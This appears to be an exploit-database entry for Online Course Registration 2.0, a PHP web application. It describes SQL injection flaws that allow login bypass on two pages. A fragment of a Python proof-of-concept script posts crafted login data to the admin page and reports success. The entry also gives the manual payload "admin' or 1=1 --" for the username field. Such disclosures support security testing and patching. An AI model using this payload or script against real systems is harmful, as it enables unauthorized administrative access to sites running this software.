Key Information Vulnerability Name: Online Course Registration 2.0 - Authentication Bypass Vulnerability ID: 48385 Author: Daniel Monzón (stark0de) Type: Webapps Platform: PHP Date: 2020-04-27 Affected Application: Online Course Registration 2.0 Test Environment: Kali Linux x64 5.4.0 Vulnerability Details SQL Injection: Multiple SQL injection vulnerabilities exist in the PHP scripts of the Online Course Registration application. Authentication Bypass: Authentication can be bypassed via two login pages. Exploit Code: A Python script is provided to verify the authentication bypass vulnerability. ```python try: req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True) resp_code = req.status_code if resp_code == 200 and "document.chngpwd.cpass.value" in req.text: print(symbol_green+" Authentication bypassed for admin user!\n") print(symbol_green+" To test this manually, visit: "+adminurl+" and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n")